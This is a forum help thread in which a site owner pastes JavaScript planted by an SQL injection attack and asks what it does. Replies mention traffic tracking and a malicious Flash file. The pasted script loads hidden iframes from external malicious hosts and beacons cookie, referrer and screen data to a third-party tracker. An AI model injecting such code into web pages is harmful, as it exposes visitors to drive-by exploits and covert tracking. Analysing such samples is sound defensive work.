Bob Butcher
asked on
sql injection js script, can someone tell me what this is doing?
Our SQL Server DB was infected with some sort of SQL injection - I downloaded th .js and it is as follows:
document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");
if (navigator.systemLanguage= ='zh-cn')
{
}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}
window.onerror=function(){ return true};
document.write ('<script>var a3327tf="51la";var a3327pu="";var a3327pf="51la";var a3327su=window.location;va r a3327sf=document.referrer; var a3327of="";var a3327op="";var a3327ops=1;var a3327ot=1;var a3327d=new Date();var a3327color="";if (navigator.appName=="Netsc ape"){a332 7color=scr een.pixelD epth;} else {a3327color=screen.colorDe pth;}<\/sc ript><scri pt>a3327tf =top.docum ent.referr er;<\/scri pt><script >a3327pu =window.parent.location;<\ /script><s cript>a332 7pf=window .parent.do cument.ref errer;<\/s cript><scr ipt>a3327o ps=documen t.cookie.m atch(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(; |$)"));a33 27ops=(a33 27ops==nul l)?1: (parseInt(unescape((a3327o ps)[2]))+1 );var a3327oe =new Date();a3327oe.setTime(a33 27oe.getTi me()+60*60 *1000);doc ument.cook ie="AJSTAT _ok_pages= "+a3327ops + ";path=/;expires="+a3327oe .toGMTStri ng();a3327 ot=documen t.cookie.m atch(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(; |$)"));if( a3327ot==n ull){a3327 ot=1;}else {a3327ot=p arseInt(un escape((a3 327ot)[2]) ); a3327ot=(a3327ops==1)?(a33 27ot+1):(a 3327ot);}a 3327oe.set Time(a3327 oe.getTime ()+365*24* 60*60*1000 );document .cookie="A JSTAT_ok_t imes="+a33 27ot+";pat h=/;expire s="+a3327o e.toGMTStr ing();<\/s cript><scr ipt>a3327o f=a3327sf; if(a3327pf !=="51la") {a3327of=a 3327pf;}if (a3327tf!= ="51la"){a 3327of=a33 27tf;}a332 7op=a3327p u;try{lain frame}catc h(e){a3327 op=a3327su ;}document .write(\'< img style="width:0px;height:0p x" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');<\/script>');
Could someone tell me exactly what this is doing?
Thanks in advance.
document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");
if (navigator.systemLanguage=
{
}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}
window.onerror=function(){
document.write ('<script>var a3327tf="51la";var a3327pu="";var a3327pf="51la";var a3327su=window.location;va
Could someone tell me exactly what this is doing?
Thanks in advance.
Looks like code that sites use to track traffic from a different domain. My guess that this an attempt to circumvent sites that publish user inputs like blogs and feedbacks.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
But to start with, it gets page 456.htm, and that one has the malicious 4562.swf, see more:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527?logdate=200808
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527?logdate=200808